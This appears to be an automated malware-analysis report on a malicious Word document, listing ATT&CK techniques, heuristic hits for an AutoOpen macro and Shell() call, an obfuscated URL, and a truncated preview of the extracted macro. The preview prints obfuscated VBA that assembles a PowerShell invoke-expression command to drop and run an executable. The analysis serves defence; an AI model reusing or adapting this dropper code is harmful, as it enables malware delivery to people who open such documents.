Verdict: MALICIOUS (risk score 182)
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The presence of an AutoOpen macro and a Shell() call within the VBA code indicates an attempt to execute arbitrary code upon opening the document. The obfuscated script likely downloads and executes a second-stage payload from the embedded URL, which is a common technique for malware delivery. The use of legacy WordBasic markers and VBA p-code execution further supports this assessment.
Heuristics (6)

- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://coP8c+P8c1jq+1jqll1jq+1jqegP8c+P8ce-de-baiP8c+P8c (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 33546 bytes | 5c8c530772f8271a761ce6e471e38c0213ec4a4f8192a36365a2ce071389a496 |
Script preview (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "QfXbmzj"
Function WrjzLzwAsYcfk()
On Error Resume Next
YlqaBSd = 3310458 + Atn(fzibJoBXMkoU) / rhTCZlLOo - Sgn(BvGFSpZwUuFkVZ * Log(DPpmWwZlGjz)) / (3210562 - MmGYqzdjCiiim * UaRHMtSWVVbS - cJAVV)
QwJMnrnUh = 4717361 + Atn(jhojuWwDAj) / EkKELo - Sgn(lXcqQkzYwB * Log(CMNKHEmll)) / (2523314 - wPVoOXiqXwLtk * CtRDj - XvjzUttcF)
QwfjiSdfnkS = 3427437 + Atn(DPvaMUbWZ) / IdXqTdIFLViBr - Sgn(BjYUUdFk * Log(ZHdobq)) / (4713328 - hJfPRIHAQlXuw * BXcYdwGBwkXXw - pohPmfBsMDj)
sSHGfw = (cbijwlX) + yHBjksbJKSUgsssd("lCvafjzYzwqFsGVdY", 6, 1)
NJqpu = 8871652 + Atn(YLbDIH) / oJLZpCfm - Sgn(DBhOPckcfCKvVf * Log(LpQrIcpa)) / (6647325 - uwumNJwwiJtKf * wazYFwVTitNzmn - UObwXUfppS)
BcksNhlD = 8658059 + Atn(znVYBJV) / hcQVlVbSAYNXIS - Sgn(uSLIaQl * Log(GMhWfI)) / (4025325 - pRswszF * BtNpQEV - jaaGpB)
PFRcsKNn = 9001328 + Atn(wTKIEzvKfMX) / QWVzMw - Sgn(jDwsBq * Log(pEhOWoWMzY)) / (7432091 - IBzCJEhPqKFduq * NbAaJRcJqcRpj - DWwKOpFjAmo)
GVfUL = (CMbjfNur) + yHBjksbJKSUgsssd("RiUFqUtPLwQwwwT5D8cU5D+U5D+PU5D+U5D8ch'+'qGk'+'hqG+P8c+P8ch'+'qU5D+U5DGeU5D+U5D-ItemhP8c+P8cqG)(gj5SDP8c+P8cC);brP'+'8c+U5D+U5DP8cea1jq+1jqk;}U5D+U5DcatP8c+P8ccP8c+P8chP8cjAciCkHSNMEXtVRR", 16, 156)
XIzBMaI = 5037467 + Atn(OzjmoISfApibN) / prrfrYzJpbSX - Sgn(hjJNcavZWuwqrl * Log(fDdJlMnooMPB)) / (8812257 - HEURK * wqbBBSMTwtoz - KimzIlluvVBN)
oWZWwstjoL = 4703479 + Atn(UOpdZ) / ArobcITzUrv - Sgn(PPjaVHLfZ * Log(BVaocQsFGPPTl)) / (3635394 - KVARlZDadzJRt * hStHKpSAnfDHO - fHwdQjLmKOnQ)
ADBWuH = 9645767 + Atn(zrTwwMYwWLbdYJ) / VOiKSuVAfAJ - Sgn(vHiUtrXDvLE * Log(CMikkC)) / (7621775 - CEpzIFf * brnwo - dpsrhlAFlJK)
cjLVZtzzwz = (kzwdfjrG) + yHBjksbJKSUgsssd("vwWsdGXasszfEplaCE(([char]103+[char]1U5'+'D+1jq+1jqU5D06+1jq+1'+'jq[char]53),[STRing]lrZfPdNEfvzApjDvAEUSX", 13, 73)
RsYTwVEsuJI = 8797129 + Atn(tUCLwSjpnzZoq) / KkqBmWNjuZ - Sgn(dhlEAmXRsW * Log(LmiXmp)) / (4489976 - lhldOViUvXfMZ * hSlvknKCWz - AZDSP)
TVibww = 6979031 + Atn(JEovsEWjW) / buNJjjFQ - Sgn(rEjjjKoYNvaC * Log(mHDVolZhYBR)) / (8423488 - cjvQqwCdsT * XEkEfInvQ - IGFOvTqETDSoHi)
CfifuMwXSu = 792259 + Atn(zFbACtniwj) / VBPOV - Sgn(jTdpCvfLZZ * Log(GjwCACLh)) / (3963022 - sOSbQLTV * DpwMb - anuKwoc)
zIahhE = (SiLnLWbEYGUVi) + yHBjksbJKSUgsssd("qtfHJhjqGUzB5env:P8c+P8cpublic + hqG1HRU1jq+'+'1jq5D+U5DP8c+P8chqG + gj5NSBP8c+P8c +P8c+'+'P8c (hqG.exhqG+h'+'1jq+1jqqGP8c+P8cehP8c+P8c1jq+1jaKvh", 13, 129)
BawGioZXDvO = 4294459 + Atn(KWVnZPRXYb) / uuDBZUz - Sgn(AIwBn * Log(QZIbkw)) / (1144514 - zNsQLvjmIckYLQ * lJqpTW - NUhdJpIw)
CSfkKcWMFE = 7658431 + Atn(JwzqIIJEUN) / TQPwz - Sgn(WRtImbfz * Log(ihmudMoIO)) / (2767847 - TdAhlzIR * DSfJYmiuTWVRq - abRZkniIAjj)
wGLPGmMkj = 9409591 + Atn(RLXnSOFUQCdVr) / uorsBcsaFUZ - Sgn(dPuRvcbsN * Log(wjDDlPJZoDs)) / (1211321 - UJqiUBqGCNtk * ZwGAtzULsIpw - dRjfWfXfaIEzH)
KlBNJ = (ALnFKNmjLpW) + yHBjksbJKSUgsssd("BWQRhEY . ( $enV:PUBlIC[13]+$Env:PubliC[5]+'x') ( ((QWCmiaOHiYQVoEFivzbJMP", 8, 45)
TkMmLs = 2633445 + Atn(wqBCmI) / jwnjjtmGNrMmkG - Sgn(HDRdTzCWdvEmrU * Log(lXlpodNU)) / (9942905 - lSLffbcDAiw * JpzjbJlbHumz - oBvRVu)
iPMEV = 6648152 + Atn(shirrzTb) / rlSBNvpIBDj - Sgn(cqjOZqZjl * Log(oPSQHVpkMR)) / (9498 - DBiEbFGJT * zuQrwdRGuuwMz - jzoUS)
wYVtPZwYp = 3410788 + Atn(SXCnfjVPUacLz) / XAPWMSFX - Sgn(dqDcU * Log(QlqBzjWNES)) / (8813113 - rZUTAzlLwYzGzm * SZwbGAlDolKwk - mLESW)
pWBUwUFuR = (YcABjiXZZWrN) + yHBjksbJKSUgsssd("JRBiopdt+'8c+P8crtimezOzu", 9, 13)
znZqpwoR = 1121022 + Atn(fiqBBJJNt) / dYzhQGXPrDLA - Sgn(Ilzzw * Log(MfaHa)) / (986730 - zCqzXiuvYo * VYATYEBLfjiQ - MLJjJ)
EhwlSPOlfS = 530400 + Atn(WcpHUYrj) / FFjwIbaCsGW - Sgn(PatRmm * Log(MUOmVXTtjtzz)) / (2404287 - iZbwTvkkH * CjKGCvqimETM - TNYpirJtHKkkA)
zjMWc = 3619784 + Atn(SrCbNajp) / MqnCQNI - Sgn(SiHku * Log(CtztvW)) / (4981867 - CcXQuBrwQ * YLcsDGduBiS - LiXlAiQj)
JCXmm = (rokBMm
... (truncated)
```